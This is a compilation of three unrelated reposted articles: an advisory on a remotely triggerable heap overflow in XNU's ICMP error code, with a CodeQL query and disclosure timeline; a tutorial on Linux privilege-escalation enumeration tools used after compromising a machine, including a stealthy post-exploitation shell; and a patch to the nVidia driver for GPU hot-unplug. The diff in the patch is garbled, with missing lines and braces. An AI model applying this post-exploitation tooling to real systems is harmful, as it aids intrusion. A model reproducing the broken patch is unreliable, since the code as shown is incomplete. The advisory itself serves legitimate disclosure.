The vulnerability is a heap buffer overflow in the networking code in the XNU operating system kernel. XNU is used by both iOS and macOS, which is why iPhones, iPads, and MacBooks are all affected. To trigger the vulnerability, an attacker merely needs to send a malicious IP packet to the IP address of the target device. No user interaction is required. The attacker only needs to be connected to the same network as the target device. For example, if you are using the free WiFi in a coffee shop then an attacker can join the same WiFi network and send a malicious packet to your device. (If an attacker is on the same network as you, it is easy for them to discover your device’s IP address using nmap.) To make matters worse, the vulnerability is in such a fundamental part of the networking code that anti-virus software will not protect you: I tested the vulnerability on a Mac running McAfee® Endpoint Security for Mac and it made no difference. It also doesn’t matter what software you are running on the device: the malicious packet will still trigger the vulnerability even if you don’t have any ports open.

Since an attacker can control the size and content of the heap buffer overflow, it may be possible for them to exploit this vulnerability to gain remote code execution on your device. I have not attempted to write an exploit which is capable of doing this. My exploit PoC just overwrites the heap with garbage, which causes an immediate kernel crash and device reboot.

I am only aware of two mitigations against this vulnerability:

  1. Enabling stealth mode in the macOS firewall prevents the attack from working. Kudos to my colleague Henti Smith for discovering this, because this is an obscure system setting which is not enabled by default. As far as I’m aware, stealth mode does not exist on iOS devices.
  2. Do not use public WiFi networks. The attacker needs to be on the same network as the target device. It is not usually possible to send the malicious packet across the internet. For example, I wrote a fake web server which sends back a malicious reply when the target device tries to load a webpage. In my experiments, the malicious packet never arrived, except when the web server was on the same network as the target device.

Proof-of-concept exploit

I have written a proof-of-concept exploit which triggers the vulnerability. To give Apple’s users time to upgrade, I will not publish the source code for the exploit PoC immediately. However, I have made a short video which shows the PoC in action, crashing all the Apple devices on the local network.

The vulnerability

The bug is a buffer overflow in this line of code (bsd/netinet/ip_icmp.c:339):

m_copydata(n, 0, icmplen, (caddr_t)&icp->icmp_ip);

This code is in the function icmp_error. According to the comment, the purpose of this function is to «Generate an error packet of type error in response to bad packet ip». It uses the ICMP protocol to send out the error message. The header of the packet that caused the error is included in the ICMP message, so the purpose of the call to m_copydata on line 339 is to copy the header of the bad packet into the ICMP message. The problem is that the header might be too big for the destination buffer. The destination buffer is an mbufmbuf is a datatype which is used to store both incoming and outgoing network packets. In this code, n is an incoming packet (containing untrusted data) and m is an outgoing ICMP packet. As we will see shortly, icp is a pointer into mm is allocated on line 294 or line 296:

if (MHLEN > (sizeof(struct ip) + ICMP_MINLEN + icmplen))
  m = m_gethdr(M_DONTWAIT, MT_HEADER);  /* MAC-OK */
else
  m = m_getcl(M_DONTWAIT, MT_DATA, M_PKTHDR);

Slightly further down, on line 314, mtod is used to get m’s data pointer:

icp = mtod(m, struct icmp *);

mtod is just a macro, so this line of code does not check that the mbuf is large enough to hold an icmp struct. Furthermore, the data is not copied to icp, but to &icp->icmp_ip, which is at an offset of +8 bytes from icp.

I do not have the necessary tools to be able to step through the XNU kernel in a debugger, so I am actually a little unsure about the exact allocation size of the mbuf. Based on what I see in the source code, I think that m_gethdr creates an mbuf that can hold 88 bytes, but I am less sure about m_getcl. Based on practical experiments, I have found that a buffer overflow is triggered when icmplen >= 84.
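To make the arithmetic concrete, here is a minimal sketch in plain user-space C (not XNU code) of the kind of bounds check that the call to m_copydata is missing. The struct icmp_sketch layout and the helpers copy_fits and icmp_copy_fits are hypothetical stand-ins introduced for illustration, and the 88-byte capacity used in the note below is only the tentative estimate given above. The sketch does not attempt to explain the empirically observed threshold of 84.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical, simplified stand-in for the start of struct icmp:
 * 4 bytes of type/code/checksum, 4 bytes of type-specific data,
 * then the embedded copy of the offending packet's IP header. */
struct icmp_sketch {
    uint8_t  type;
    uint8_t  code;
    uint16_t cksum;
    uint32_t hdr_data;
    uint8_t  ip[1];     /* destination of the copy (&icp->icmp_ip) */
};

/* The copy destination sits 8 bytes past the start of the struct. */
static_assert(offsetof(struct icmp_sketch, ip) == 8,
              "copy destination is expected at offset +8");

/* Returns 1 if writing len bytes at offset stays inside a buffer of
 * capacity bytes, 0 otherwise. Written so the sum cannot wrap around. */
static int copy_fits(size_t capacity, size_t offset, size_t len)
{
    if (offset > capacity)
        return 0;
    return len <= capacity - offset;
}

/* Assumed helper: the check a caller could make before copying icmplen
 * bytes to &icp->icmp_ip inside a buffer of the given capacity. */
static int icmp_copy_fits(size_t capacity, size_t icmplen)
{
    return copy_fits(capacity, offsetof(struct icmp_sketch, ip), icmplen);
}
```

Under the assumed capacity of 88 bytes, icmp_copy_fits(88, 80) returns 1 and icmp_copy_fits(88, 81) returns 0, because the 8-byte offset has to be counted against the buffer as well.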

At this time, I will not say any more about how the exploit works. I want to give Apple users a chance to upgrade their devices first. However, in the relatively near future I will publish the source code for the exploit PoC in our SecurityExploits repository.

Finding the vulnerability with QL

I found this vulnerability by doing variant analysis on the bug that caused the buffer overflow vulnerability in the packet-mangler. That vulnerability was caused by a call to mbuf_copydata with a user-controlled size argument. So I wrote a simple query to look for similar bugs:

/**
 * @name mbuf copydata with tainted size
 * @description Calling m_copydata with an untrusted size argument
 *              could cause a buffer overflow.
 * @kind path-problem
 * @problem.severity warning
 * @id apple-xnu/cpp/mbuf-copydata-with-tainted-size
 */

import cpp
import semmle.code.cpp.dataflow.TaintTracking
import DataFlow::PathGraph

class Config extends TaintTracking::Configuration {
  Config() { this = "tcphdr_flow" }

  override predicate isSource(DataFlow::Node source) {
    source.asExpr().(FunctionCall).getTarget().getName() = "m_mtod"
  }

  override predicate isSink(DataFlow::Node sink) {
    exists (FunctionCall call
    | call.getArgument(2) = sink.asExpr() and
      // any function whose name ends in "copydata", e.g. m_copydata
      call.getTarget().getName().matches("%copydata"))
  }
}

from Config cfg, DataFlow::PathNode source, DataFlow::PathNode sink
where cfg.hasFlowPath(source, sink)
select sink, source, sink, "m_copydata with tainted size."

This is a simple taint-tracking query which looks for dataflow from m_mtod to the size argument of a «copydata» function. The function named m_mtod returns the data pointer of an mbuf, so it is quite likely that it will return untrusted data. It is what the mtod macro expands to. Obviously m_mtod is just one of many sources of untrusted data in the XNU kernel, but I have not included any other sources to keep the query as simple as possible. This query returns 9 results, the first of which is the vulnerability in icmp_error. I believe the other 8 results are false positives, but the code is sufficiently complicated that I do not consider them to be bad query results.

Try QL on XNU

Unlike most other open source projects, XNU is not available to query on LGTM. This is because LGTM uses Linux workers to build projects, but XNU can only be built on a Mac. Even on a Mac, XNU is highly non-trivial to build. I would not have been able to do it if I had not found this incredibly useful blog post by Jeremy Andrus. Using Jeremy Andrus’s instructions and scripts, I have manually built snapshots for the three most recent published versions of XNU. You can download the snapshots from these links: 10.13.4, 10.13.5, 10.13.6. Unfortunately, Apple have not yet released the source code for 10.14 (Mojave / iOS 12), so I cannot create a QL snapshot for running queries against it yet. To run queries on these QL snapshots, you will need to download QL for Eclipse. Instructions on how to use QL for Eclipse can be found here.


Timeline

  • 2018-08-09: Privately disclosed to Apple. Proof-of-concept exploit included.
  • 2018-08-09: Report acknowledged by Apple.
  • 2018-08-20: Apple asked me to send them the exact macOS version number and a panic log.
  • 2018-08-20: Returned the requested information to Apple. Also sent them a slightly improved version of the exploit PoC.
  • 2018-08-22: Apple confirmed that the issue is fixed in the betas of macOS Mojave and iOS 12. However, they also said that they are «investigating addressing this issue on additional platforms» and that they will not disclose the issue until November 2018.
  • 2018-09-17: iOS 12 released by Apple. The vulnerability was fixed.
  • 2018-09-24: macOS Mojave released by Apple. The vulnerability was fixed.
  • 2018-10-30: Vulnerabilities disclosed.

"Send it back"


  • «I am Error». Screenshot from Zelda II: The Adventure of Link. The screenshot copyright is believed to belong to Nintendo. Image downloaded from Wikipedia.
  • «Send it back». By Edward Backhouse.

Linux Privilege Escalation via Automated Script


( Original text by Raj Chandel )

We all know that after compromising a victim’s machine we usually hold a low-privileged shell that we want to escalate into a higher-privileged one; this process is known as privilege escalation. In this article we discuss what falls under privilege escalation and how an attacker can tell whether a low-privileged shell can be escalated to a higher-privileged one. Beyond that, there are several scripts for Linux that come in useful when trying to escalate privileges on a target system. They are generally aimed at enumeration rather than at specific vulnerabilities or exploits, and can save you a lot of time.

Table of Contents

  • Introduction
  • Vectors of Privilege Escalation
  • LinEnum
  • Linuxprivchecker
  • Linux Exploit Suggester 2
  • Bashark
  • BeRoot


Introduction

Privilege escalation is the phase that comes after the attacker has compromised the victim’s machine, in which the attacker tries to gather critical information about the system, such as hidden passwords and weakly configured services or applications. All this information helps the attacker carry out post-exploitation against the machine to obtain a higher-privileged shell.

Vectors of Privilege Escalation

  • OS Detail & Kernel Version
  • Any Vulnerable package installed or running
  • Files and Folders with Full Control or Modify Access
  • Files with SUID Permissions
  • Mapped Drives (NFS)
  • Potentially Interesting Files
  • Environment Variable Path
  • Network Information (interfaces, arp, netstat)
  • Running Processes
  • Cronjobs
  • User’s Sudo Rights
  • Wildcard Injection

Several scripts are used in penetration testing to quickly identify potential privilege escalation vectors on Linux systems. Today we will walk through each of the scripts that worked smoothly for us.


LinEnum

LinEnum performs scripted local Linux enumeration and privilege escalation checks. It is a shell script that enumerates the system configuration. Here is a high-level summary of the checks/tasks performed by LinEnum.

Privileged access: Checks whether the current user has sudo access without a password, and whether root’s home directory is accessible.

System Information: Hostname, networking details, current IP, etc.

User Information: Current user, List all users including uid/gid information, List root accounts, Checks if password hashes are stored in /etc/passwd.

Kernel and distribution release details.
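As an illustration of one of these checks, the following is a minimal sketch of how "password hashes stored in /etc/passwd" could be detected for a single line of that file. This is not LinEnum's code (LinEnum is a shell script). The function name passwd_line_has_hash is hypothetical, and treating an empty field, "x", or a field starting with '*' or '!' as "no hash" is an assumption of this sketch.

```c
#include <assert.h>
#include <string.h>

/* Returns 1 if the password field (second colon-separated field) of an
 * /etc/passwd line looks like an embedded hash, 0 otherwise.
 * "x" means the hash lives in /etc/shadow; an empty field or one that
 * starts with '*' or '!' is treated as "no usable hash" in this sketch. */
static int passwd_line_has_hash(const char *line)
{
    assert(line != NULL);

    const char *start = strchr(line, ':');
    if (start == NULL)
        return 0;                         /* malformed line: no fields */
    start++;                              /* skip the first ':' */

    size_t len = strcspn(start, ":\n");   /* length of the password field */
    if (len == 0)
        return 0;
    if (len == 1 && start[0] == 'x')
        return 0;
    if (start[0] == '*' || start[0] == '!')
        return 0;
    return 1;
}
```

A caller would typically read /etc/passwd line by line (for example with fgets) and report every line for which the function returns 1.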

You can download it from GitHub with the following command:

Once you have downloaded the script, you can run it by typing ./ followed by the script name in a terminal. It will dump all the fetched data and system details.

Let’s analyze what its results bring us:

OS & Kernel Info: 4.15.0-36-generic, Ubuntu-16.04.1

Hostname: Ubuntu


Super User Accounts: root, demo, hack, raaz

Sudo Rights User: Ignite, raj

Home Directories File Permission

Environment Information

And many more such things that fall under post-exploitation.


Linuxprivchecker

Linuxprivchecker enumerates the system configuration and runs some privilege escalation checks as well. It is a Python implementation that suggests exploits specific to the compromised system. Use wget to download the script from its source URL.

To use this script, run it with python in a terminal; it will enumerate file and directory permissions and contents. This script works the same way as LinEnum and hunts for details related to the system, network and users.

Let’s analyze what its results bring us:

OS & Kernel Info: 4.15.0-36-generic, Ubuntu-16.04.1

Hostname: Ubuntu

Network Info: Interface, Netstat

Writable Directory and Files for Users other than Root: /home/raj/script/

Checks if Root’s home folder is accessible

File having SUID/SGID Permission

For example: /bin/raj/ which is a bash script with SUID Permission

Linux Exploit Suggester 2

Next-generation exploit suggester based on Linux_Exploit_Suggester. This program performs a ‘uname -r‘ to grab the Linux operating system release version, and returns a list of possible exploits.
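The release string that ‘uname -r’ prints comes from the uname(2) system call. As a rough sketch of the first step of such a tool (not the suggester's own code), the snippet below reads the release and extracts the major and minor version numbers that could then be matched against a list of known exploits. The helper names parse_release and running_kernel are hypothetical.

```c
#include <assert.h>
#include <stdio.h>
#include <sys/utsname.h>

/* Parses the leading "major.minor" of a release string such as
 * "4.15.0-36-generic". Returns 0 on success, -1 on failure. */
static int parse_release(const char *release, int *kmajor, int *kminor)
{
    assert(release != NULL && kmajor != NULL && kminor != NULL);
    return sscanf(release, "%d.%d", kmajor, kminor) == 2 ? 0 : -1;
}

/* Fills kmajor/kminor for the running kernel via uname(2), the system
 * call behind `uname -r`. Returns 0 on success, -1 on failure. */
static int running_kernel(int *kmajor, int *kminor)
{
    struct utsname u;

    if (uname(&u) != 0)
        return -1;
    return parse_release(u.release, kmajor, kminor);
}
```

For the release shown in the earlier results, parse_release("4.15.0-36-generic", &a, &b) stores 4 and 15.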

This script is extremely useful for quickly finding privilege escalation vulnerabilities both in on-site and exam environments.

Key Improvements Include:

  • More exploits
  • Accurate wildcard matching. This expands the scope of searchable exploits.
  • Output colorization for easy viewing.
  • And more to come

You can use the ‘-k’ flag to manually enter a wildcard for the kernel/operating system release version.


Bashark

Bashark aids pentesters and security researchers during the post-exploitation phase of security audits.

Its Features

  • Single Bash script
  • Lightweight and fast
  • Multi-platform: Unix, OSX, Solaris etc.
  • No external dependencies
  • Immune to heuristic and behavioural analysis
  • Built-in aliases of often used shell commands
  • Extends system shell with post-exploitation oriented functionalities
  • Stealthy, with custom cleanup routine activated on exit
  • Easily extensible (add new commands by creating Bash functions)
  • Full tab completion

Execute the following command to download it from GitHub:


To execute the script, run the following command:

The help command lists all the options Bashark provides for post-exploitation.

With the portscan option you can scan the internal network of the compromised machine.

To fetch all configuration files, use the getconf option. It pulls out all the configuration files stored inside the /etc directory. Similarly, you can use the getprem option to view all binary files on the target’s machine.


BeRoot

The BeRoot Project is a post-exploitation tool that checks for common misconfigurations in order to find a way to escalate our privileges. This tool does not perform any exploitation. Its main goal is not to carry out a configuration assessment of the host (listing all services, all processes, all network connections, etc.) but to print only the information that has been found to be a potential way to escalate our privileges.


To execute the script, run the following command:

It will try to enumerate all possible loopholes that can lead to privilege escalation. As you can observe, the text highlighted in yellow represents a weak configuration that can lead to root privilege escalation, whereas the text in red represents the technique that can be used to exploit it.

Its Functions:

Check Files Permissions

SUID bin

NFS root Squashing


Sudo rules

Kernel Exploit

Conclusion: All of the scripts executed above are available on GitHub, where you can easily download them. All of these automated scripts try to identify weak configurations that can lead to root privilege escalation.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, and a social media and gadgets lover.

Patching nVidia GPU driver for hot-unplug on Linux

( original text by @whitequark )

Recently, I’ve been using an extremely cursed setup where my XPS 13 9360 laptop is connected to a Sonnet EchoExpress 2 box rewired for Thunderbolt 3 that has an nVidia Quadro 600 GPU, and Linux is set up for render offload to the eGPU and then frame transfer back to iGPU to be displayed on the laptop’s integrated display, which (to my sheer surprise) not only works quite reliably, but even gives me higher FPS in Team Fortress 2 than the iGPU.

There’s only really one downside: if the eGPU falls off the bus, either because someone™ pulled out the cable, or because the stars didn’t align quite right this morning and it decided to enumerate seemingly at random (sometimes this is preceded by whining from PCIe AER, sometimes not, I think it’s some sort of hardware issue like a badly inserted PCIe card, but I’m not entirely sure), the nVidia driver… hangs. Hangs quite deliberately, as the sources to the kernel driver show. This leaves the Xorg instance bound to the eGPU hung forever (which confuses bumblebee, but is otherwise not especially bad), and also prevents any new ones from using the eGPU (which is bad).

Anyway, I was kind of annoyed of rebooting every time it happens, so I decided to reboot a few more dozen times instead while patching the driver. This has indeed worked, and left me with something similar to a functional hot-unplug, mildly crippled by the fact that nvidia-modeset is a completely opaque blob that keeps some internal state and tries to act on it, getting stuck when it tries to do something to the now-missing eGPU.

Turns out, there are only a few issues preventing functional hot-unplug.

  1. In nvidia_remove, the driver actually checks if anyone’s still trying to use it, and if yes, it tries to just hang the removal process. This doesn’t actually work, or rather, it mostly works by accident. It starts an infinite loop calling os_schedule() while having taken the NV_LINUX_DEVICES lock. While in the default configuration this indeed hangs any reentrant requests into the driver by virtue of NV_CHECK_PCI_CONFIG_SPACE taking the same lock (in verify_pci_bars), passing the NVreg_CheckPCIConfigSpace=0 module option eliminates that accidental safety mechanism, and allows reentrant requests to proceed. They do not crash due to memory being deallocated in nvidia_remove (so you don’t get an unhandled kernel page fault), but they still crash due to being unable to access the GPU.
  2. The NVKMS component (in the nvidia-modeset module) tries to maintain some state, and change it when e.g. the Xorg instance quits and closes the /dev/nvidia-modeset file. Unfortunately, it does not expect the GPU to go away, and first spews a few messages to dmesg similar to nvidia-modeset: ERROR: GPU:0: Failed to query display engine channel state: 0x0000857d:0:0:0x0000000f, after which it appears to hang somewhere inside the blob, which has been conveniently stripped of all symbols. This needs to be prevented, but…
  3. The NVKMS component effectively only exposes a single opaque ioctl, and all the communication, including communication of the GPU bus ID, happens out of band with regards to the open source parts of the nvidia-modeset module. Fortunately, NVKMS calls back into NVRM, and this allows us to associate each /dev/nvidia-modeset fd with the GPU bus ID.
  4. When unloading NVKMS, it also tries to act on its internal state and change the GPU state, which leads to the same hang.

All in all, this allows a patch to be written that detects when a GPU goes away, ignores all further NVKMS requests related to that specific GPU (and returns -ENOENT in response to ioctls, which Xorg appropriately interprets as a fault condition), correctly releases the resources by requesting NVRM, and improperly unloads NVKMS so it doesn’t try to reset the GPU state. (All actual resources should be released by this point, and NVKMS doesn’t have any resource allocation callbacks other than those we already intercept, so in theory this doesn’t have any bad consequences. But I’m not working for nVidia, so this might be completely wrong.)
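The core idea can be sketched in a few lines of user-space C with C11 atomics: a per-GPU "dead" flag is set once on removal, and every request coming through a file handle associated with that GPU is refused with -ENOENT instead of being forwarded. This is only an illustration of the gating pattern, not driver code; the types gpu_sketch and open_sketch and the functions mark_dead and ioctl_sketch are hypothetical names.

```c
#include <assert.h>
#include <errno.h>
#include <stdatomic.h>
#include <stddef.h>

/* Hypothetical per-GPU state: set to 1 once the GPU has been removed. */
struct gpu_sketch {
    atomic_int dead;
};

/* Hypothetical per-open-file state: which GPU (if any) this handle is
 * associated with, and a pointer to that GPU's dead flag. */
struct open_sketch {
    unsigned    gpu_id;     /* 0 means "no GPU associated yet" */
    atomic_int *gpu_dead;
    int         forwarded;  /* counts requests passed on to the backend */
};

/* Called from the removal path. */
static void mark_dead(struct gpu_sketch *gpu)
{
    atomic_store(&gpu->dead, 1);
}

/* Gate in front of the opaque backend: refuse requests for a dead GPU. */
static int ioctl_sketch(struct open_sketch *po)
{
    assert(po != NULL);
    if (po->gpu_id != 0 && atomic_load(po->gpu_dead) != 0)
        return -ENOENT;     /* the caller sees a fault condition */
    po->forwarded++;        /* stand-in for calling into the backend */
    return 0;
}
```

The gate is checked before the backend is ever entered, so the opaque component never gets the chance to touch the missing device.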

After the GPU is plugged back in, NVKMS will try to act on its internal state again; in this case, it doesn’t hang, but it doesn’t initialize the GPU correctly either, so the nvidia-modeset kernel module has to be (manually) reloaded. It’s not easy to do this automatically because in a hypothetical system with more than one nVidia GPU the module would still be in use when one of them dies, and so just hard reloading NVKMS would have unfortunate consequences. (Though, I don’t really know whether NVKMS would try to access the dead GPU in response to the request acting on the other GPU anyway. I decided to do it conservatively.) Once it’s reloaded you’re back in the game though!

Here’s the patch, written against the nvidia-legacy-390xx-390.87 Debian source package:

nvidia-hot-gpu-on-gpu-unplug-action.patch
diff -ur original/common/inc/nv-linux.h patched/common/inc/nv-linux.h
--- original/common/inc/nv-linux.h	2018-09-23 12:20:02.000000000 +0000
+++ patched/common/inc/nv-linux.h	2018-10-28 07:19:21.526566940 +0000
@@ -1465,6 +1465,7 @@
 typedef struct nv_linux_state_s {
     nv_state_t nv_state;
     atomic_t usage_count;
+    atomic_t dead;
     struct pci_dev *dev;
diff -ur original/common/inc/nv-modeset-interface.h patched/common/inc/nv-modeset-interface.h
--- original/common/inc/nv-modeset-interface.h	2018-08-22 00:55:23.000000000 +0000
+++ patched/common/inc/nv-modeset-interface.h	2018-10-28 07:22:00.768238371 +0000
@@ -25,6 +25,8 @@
 #include "nv-gpu-info.h"
+#include <asm/atomic.h>
  * nvidia_modeset_rm_ops_t::op gets assigned a function pointer from
  * core RM, which uses the calling convention of arguments on the
@@ -115,6 +117,8 @@
     int (*set_callbacks)(const nvidia_modeset_callbacks_t *cb);
+    atomic_t * (*gpu_dead)(NvU32 gpu_id);
 } nvidia_modeset_rm_ops_t;
 NV_STATUS nvidia_get_rm_ops(nvidia_modeset_rm_ops_t *rm_ops);
diff -ur original/common/inc/nv-proto.h patched/common/inc/nv-proto.h
--- original/common/inc/nv-proto.h	2018-08-22 00:55:23.000000000 +0000
+++ patched/common/inc/nv-proto.h	2018-10-28 07:20:49.939494812 +0000
@@ -81,6 +81,7 @@
 NvBool      nvidia_get_gpuid_list       (NvU32 *gpu_ids, NvU32 *gpu_count);
 int         nvidia_dev_get              (NvU32, nvidia_stack_t *);
 void        nvidia_dev_put              (NvU32, nvidia_stack_t *);
+atomic_t *  nvidia_dev_dead             (NvU32);
 int         nvidia_dev_get_uuid         (const NvU8 *, nvidia_stack_t *);
 void        nvidia_dev_put_uuid         (const NvU8 *, nvidia_stack_t *);
 int         nvidia_dev_get_pci_info     (const NvU8 *, struct pci_dev **, NvU64 *, NvU64 *);
diff -ur original/nvidia/nv.c patched/nvidia/nv.c
--- original/nvidia/nv.c	2018-09-23 12:20:02.000000000 +0000
+++ patched/nvidia/nv.c	2018-10-28 07:48:05.895025112 +0000
@@ -1944,6 +1944,12 @@
     unsigned int i;
     NvBool bRemove = NV_FALSE;
+    if (NV_ATOMIC_READ(nvl->dead))
+    {
+        nv_printf(NV_DBG_ERRORS, "NVRM: nvidia_close called on dead device by pid %d!\n",
+                  current->pid);
+    }
     /* for control device, just jump to its open routine */
@@ -2106,6 +2112,12 @@
     size_t arg_size;
     int arg_cmd;
+    if (NV_ATOMIC_READ(nvl->dead))
+    {
+        nv_printf(NV_DBG_ERRORS, "NVRM: nvidia_ioctl called on dead device by pid %d!\n",
+                  current->pid);
+    }
     nv_printf(NV_DBG_INFO, "NVRM: ioctl(0x%x, 0x%x, 0x%x)\n",
         _IOC_NR(cmd), (unsigned int) i_arg, _IOC_SIZE(cmd));
@@ -3217,6 +3229,7 @@
     NV_ATOMIC_SET(nvl->usage_count, 0);
+    NV_ATOMIC_SET(nvl->dead, 0);
     if (!rm_init_event_locks(sp, nv))
         return NV_FALSE;
@@ -4018,14 +4031,38 @@
                   "NVRM: Attempting to remove minor device %u with non-zero usage count!\n",
+        nv_printf(NV_DBG_ERRORS,
+                  "NVRM: YOLO, waiting for usage count to drop to zero\n");
-        /* We can't continue without corrupting state, so just hang to give the
-         * user some chance to do something about this before reboot */
-        while (1)
+        NV_ATOMIC_SET(nvl->dead, 1);
+        /* Insanity check: wait until all clients die, then hope for the best. */
+        while (1) {
-    }
+            LOCK_NV_LINUX_DEVICES();
+            nvl = pci_get_drvdata(dev);
+            if (!nvl || (nvl->dev != dev))
+            {
+                goto done;
+            }
+            if (NV_ATOMIC_READ(nvl->usage_count) == 0)
+            {
+                break;
+            }
+        }
+        nv_printf(NV_DBG_ERRORS,
+                  "NVRM: Usage count is now zero, proceeding to remove the GPU\n");
+        nv_printf(NV_DBG_ERRORS,
+                  "NVRM: This is not actually supposed to work lol. Hope it does tho 👍\n");
+        nv_printf(NV_DBG_ERRORS,
+                  "NVRM: You probably want to reload nvidia-modeset now if you want any "
+                  "of this to ever start up again, but like, man, that's your choice entirely\n");
+    }
     nv = NV_STATE_PTR(nvl);
     if (nvl == nv_linux_devices)
         nv_linux_devices = nvl->next;
@@ -4712,6 +4749,22 @@
+atomic_t *nvidia_dev_dead(NvU32 gpu_id)
+    nv_linux_state_t *nvl;
+    atomic_t *ret;
+    /* Takes nvl->ldata_lock */
+    nvl = find_gpu_id(gpu_id);
+    if (!nvl)
+        return NV_FALSE;
+    ret = &nvl->dead;
+    up(&nvl->ldata_lock);
+    return ret;
  * Like nvidia_dev_get but uses UUID instead of gpu_id. Note that this may
  * trigger initialization and teardown of unrelated devices to look up their
diff -ur original/nvidia/nv-modeset-interface.c patched/nvidia/nv-modeset-interface.c
--- original/nvidia/nv-modeset-interface.c	2018-08-22 00:55:22.000000000 +0000
+++ patched/nvidia/nv-modeset-interface.c	2018-10-28 07:20:25.959243110 +0000
@@ -114,6 +114,7 @@
         .close_gpu      = nvidia_dev_put,
         .op             = rm_kernel_rmapi_op, /* provided by nv-kernel.o */
         .set_callbacks  = nvidia_modeset_set_callbacks,
+        .gpu_dead       = nvidia_dev_dead,
     if (strcmp(rm_ops->version_string, NV_VERSION_STRING) != 0)
diff -ur original/nvidia/nv-reg.h patched/nvidia/nv-reg.h
diff -ur original/nvidia-modeset/nvidia-modeset-linux.c patched/nvidia-modeset/nvidia-modeset-linux.c
--- original/nvidia-modeset/nvidia-modeset-linux.c	2018-09-23 12:20:02.000000000 +0000
+++ patched/nvidia-modeset/nvidia-modeset-linux.c	2018-10-28 07:47:14.738703417 +0000
@@ -75,6 +75,9 @@
 static struct semaphore nvkms_lock;
+static NvU32 clopen_gpu_id;
+static NvBool leak_on_unload;
  * NVKMS executes queued work items on a single kthread.
@@ -89,6 +92,9 @@
 struct nvkms_per_open {
     void *data;
+    NvU32 gpu_id;
+    atomic_t *gpu_dead;
     enum NvKmsClientType type;
     union {
@@ -711,6 +717,9 @@
     nvidia_modeset_stack_ptr stack = NULL;
     NvBool ret;
+    printk(KERN_INFO NVKMS_LOG_PREFIX "nvkms_open_gpu called with %08x, pid %d\n",
+           gpuId, current->pid);
     if (__rm_ops.alloc_stack(&stack) != 0) {
         return NV_FALSE;
@@ -719,6 +728,10 @@
+    if (ret) {
+        clopen_gpu_id = gpuId;
+    }
     return ret;
@@ -726,12 +739,17 @@
     nvidia_modeset_stack_ptr stack = NULL;
+    printk(KERN_INFO NVKMS_LOG_PREFIX "nvkms_close_gpu called with %08x, pid %d\n",
+           gpuId, current->pid);
     if (__rm_ops.alloc_stack(&stack) != 0) {
     __rm_ops.close_gpu(gpuId, stack);
+    clopen_gpu_id = gpuId;
@@ -771,8 +789,14 @@
     popen->type = type;
+    printk(KERN_INFO NVKMS_LOG_PREFIX "entering nvkms_open_common, pid %d\n",
+           current->pid);
     *status = down_interruptible(&nvkms_lock);
+    printk(KERN_INFO NVKMS_LOG_PREFIX "taken lock in nvkms_open_common, pid %d\n",
+           current->pid);
     if (*status != 0) {
         goto failed;
@@ -781,6 +805,9 @@
+    printk(KERN_INFO NVKMS_LOG_PREFIX "given up lock in nvkms_open_common, pid %d\n",
+           current->pid);
     if (popen->data == NULL) {
         *status = -EPERM;
         goto failed;
@@ -799,10 +826,16 @@
     *status = 0;
+    printk(KERN_INFO NVKMS_LOG_PREFIX "exiting in nvkms_open_common, pid %d\n",
+           current->pid);
     return popen;
+    printk(KERN_INFO NVKMS_LOG_PREFIX "error in nvkms_open_common, pid %d\n",
+           current->pid);
     nvkms_free(popen, sizeof(*popen));
     return NULL;
@@ -816,14 +849,36 @@
      * mutex.
+    printk(KERN_INFO NVKMS_LOG_PREFIX "entering nvkms_close_common, pid %d\n",
+           current->pid);
-    nvKmsClose(popen->data);
+    printk(KERN_INFO NVKMS_LOG_PREFIX "taken lock in nvkms_close_common, pid %d\n",
+           current->pid);
+    if (popen->gpu_id != 0 && atomic_read(popen->gpu_dead) != 0) {
+        printk(KERN_ERR NVKMS_LOG_PREFIX "awwww u need cleanup :3 "
+               "in nvkms_close_common, pid %d\n",
+               current->pid);
+        nvkms_close_gpu(popen->gpu_id);
+        popen->gpu_id = 0;
+        popen->gpu_dead = NULL;
+        leak_on_unload = NV_TRUE;
+    } else {
+        nvKmsClose(popen->data);
+    }
     popen->data = NULL;
+    printk(KERN_INFO NVKMS_LOG_PREFIX "given up lock in nvkms_close_common, pid %d\n",
+           current->pid);
     if (popen->type == NVKMS_CLIENT_KERNEL_SPACE) {
          * Flush any outstanding nvkms_kapi_event_kthread_q_callback() work
@@ -844,6 +899,9 @@
     nvkms_free(popen, sizeof(*popen));
+    printk(KERN_INFO NVKMS_LOG_PREFIX "exiting nvkms_close_common, pid %d\n",
+           current->pid);
 int NVKMS_API_CALL nvkms_ioctl_common
@@ -855,20 +913,58 @@
     int status;
     NvBool ret;
+    printk(KERN_INFO NVKMS_LOG_PREFIX "entering nvkms_ioctl_common, pid %d\n",
+           current->pid);
     status = down_interruptible(&nvkms_lock);
     if (status != 0) {
         return status;
+    printk(KERN_INFO NVKMS_LOG_PREFIX "taken lock in nvkms_ioctl_common, pid %d\n",
+           current->pid);
+    if (popen->gpu_id != 0 && atomic_read(popen->gpu_dead) != 0) {
+        goto dead;
+    }
+    clopen_gpu_id = 0;
     if (popen->data != NULL) {
         ret = nvKmsIoctl(popen->data, cmd, address, size);
     } else {
         ret = NV_FALSE;
+    if (clopen_gpu_id != 0) {
+        if (!popen->gpu_id) {
+            printk(KERN_INFO NVKMS_LOG_PREFIX "detected gpu %08x open in nvkms_ioctl_common, "
+                   "pid %d\n", clopen_gpu_id, current->pid);
+            popen->gpu_id = clopen_gpu_id;
+            popen->gpu_dead = __rm_ops.gpu_dead(clopen_gpu_id);
+        } else {
+            printk(KERN_INFO NVKMS_LOG_PREFIX "detected gpu %08x close in nvkms_ioctl_common, "
+                   "pid %d\n", clopen_gpu_id, current->pid);
+            popen->gpu_id = 0;
+            popen->gpu_dead = NULL;
+        }
+    }
+    printk(KERN_INFO NVKMS_LOG_PREFIX "given up lock in nvkms_ioctl_common, pid %d\n",
+           current->pid);
     return ret ? 0 : -EPERM;
+    up(&nvkms_lock);
+    printk(KERN_ERR NVKMS_LOG_PREFIX "*notices ur gpu is dead* owo whats this "
+           "in nvkms_ioctl_common, pid %d\n",
+           current->pid);
+    return -ENOENT;
@@ -1239,9 +1335,14 @@
-    down(&nvkms_lock);
-    nvKmsModuleUnload();
-    up(&nvkms_lock);
+    if(leak_on_unload) {
+        printk(KERN_ERR NVKMS_LOG_PREFIX "im just gonna leak all the kms junk ok? "
+               "haha nvm wasnt a question. in nvkms_exit\n");
+    } else {
+        down(&nvkms_lock);
+        nvKmsModuleUnload();
+        up(&nvkms_lock);
+    }
      * At this point, any pending tasks should be marked canceled, but

